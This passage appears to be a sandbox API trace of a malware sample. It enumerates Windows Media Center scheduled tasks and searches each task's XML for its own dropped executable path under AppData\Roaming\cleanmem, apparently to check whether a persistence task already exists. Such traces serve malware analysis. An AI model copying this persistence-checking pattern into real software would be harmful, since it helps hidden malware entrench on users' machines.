ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.197] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="ObjectStoreRecoveryTask") returned 0x0 [0228.197] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-131)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-132)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -ObjectStoreRecoveryTask\r\n \r\n \r\n {177AFECE-9599-46cf-90D7-68EC9EEB27B4}\r\n \r\n \r\n \r\n") returned 0x0 [0228.199] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-131)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-132)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -ObjectStoreRecoveryTask\r\n \r\n \r\n {177AFECE-9599-46cf-90D7-68EC9EEB27B4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.222] IUnknown:Release (This=0x297030) returned 0x0 [0228.222] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.222] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="OCURActivate") returned 0x0 [0228.222] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURActivate\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURActivate\r\n \r\n \r\n") returned 0x0 [0228.224] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURActivate\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURActivate\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.242] IUnknown:Release (This=0x297030) returned 0x0 [0228.242] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.242] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="OCURDiscovery") returned 0x0 [0228.242] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURDiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURDiscovery $(Arg0)\r\n \r\n \r\n") returned 0x0 [0228.244] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURDiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURDiscovery $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.262] IUnknown:Release (This=0x297030) returned 0x0 [0228.262] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.262] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="PBDADiscovery") returned 0x0 [0228.262] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0228.264] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.282] IUnknown:Release (This=0x297030) returned 0x0 [0228.282] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.282] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="PBDADiscoveryW1") returned 0x0 [0228.282] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW1\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:7 /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0228.284] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW1\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:7 /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.308] IUnknown:Release (This=0x297030) returned 0x0 [0228.308] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.308] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="PBDADiscoveryW2") returned 0x0 [0228.308] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW2\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:90 /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0228.310] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW2\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:90 /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.334] IUnknown:Release (This=0x297030) returned 0x0 [0228.334] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.334] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="PeriodicScanRetry") returned 0x0 [0228.334] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-104)\r\n 2008-07-06T05:40:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-103)\r\n \\Microsoft\\Windows\\Media Center\\PeriodicScanRetry\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n 2006-09-09T17:33:00\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n \r\n \r\n \r\n %windir%\\ehome\\MCUpdate.exe\r\n -pscn 0\r\n \r\n \r\n") returned 0x0 [0228.336] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-104)\r\n 2008-07-06T05:40:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-103)\r\n \\Microsoft\\Windows\\Media Center\\PeriodicScanRetry\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n 2006-09-09T17:33:00\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n \r\n \r\n \r\n %windir%\\ehome\\MCUpdate.exe\r\n -pscn 0\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.367] IUnknown:Release (This=0x297030) returned 0x0 [0228.367] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.367] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="PvrRecoveryTask") returned 0x0 [0228.367] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-129)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-130)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrRecoveryTask\r\n \r\n \r\n {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}\r\n \r\n \r\n \r\n") returned 0x0 [0228.369] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-129)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-130)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrRecoveryTask\r\n \r\n \r\n {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.391] IUnknown:Release (This=0x297030) returned 0x0 [0228.391] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.391] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="PvrScheduleTask") returned 0x0 [0228.391] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrScheduleTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-135)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-136)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrSchedule\r\n \r\n \r\n {CEF51277-5358-477b-858C-4E14F0C80BF7}\r\n \r\n \r\n \r\n") returned 0x0 [0228.393] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrScheduleTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-135)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-136)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrSchedule\r\n \r\n \r\n {CEF51277-5358-477b-858C-4E14F0C80BF7}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.419] IUnknown:Release (This=0x297030) returned 0x0 [0228.419] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.419] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="RecordingRestart") returned 0x0 [0228.419] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RecordingRestart\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-127)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-128)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n false\r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehrec\r\n /RestartRecording\r\n \r\n \r\n") returned 0x0 [0228.422] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RecordingRestart\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-127)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-128)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n false\r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehrec\r\n /RestartRecording\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.446] IUnknown:Release (This=0x297030) returned 0x0 [0228.446] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.446] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="RegisterSearch") returned 0x0 [0228.446] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RegisterSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRegisterSearch $(Arg0)\r\n \r\n \r\n") returned 0x0 [0228.448] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RegisterSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRegisterSearch $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.469] IUnknown:Release (This=0x297030) returned 0x0 [0228.469] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.469] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="ReindexSearchRoot") returned 0x0 [0228.469] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ReindexSearchRoot\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoReindexSearchRoot\r\n \r\n \r\n") returned 0x0 [0228.471] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ReindexSearchRoot\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoReindexSearchRoot\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.490] IUnknown:Release (This=0x297030) returned 0x0 [0228.490] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.490] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="SqlLiteRecoveryTask") returned 0x0 [0228.490] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-133)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-134)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -SqlLiteRecoveryTask\r\n \r\n \r\n {59116E30-02BD-4b84-BA1E-5D77E809B1A2}\r\n \r\n \r\n \r\n") returned 0x0 [0228.492] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-133)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-134)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -SqlLiteRecoveryTask\r\n \r\n \r\n {59116E30-02BD-4b84-BA1E-5D77E809B1A2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.515] IUnknown:Release (This=0x297030) returned 0x0 [0228.515] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), 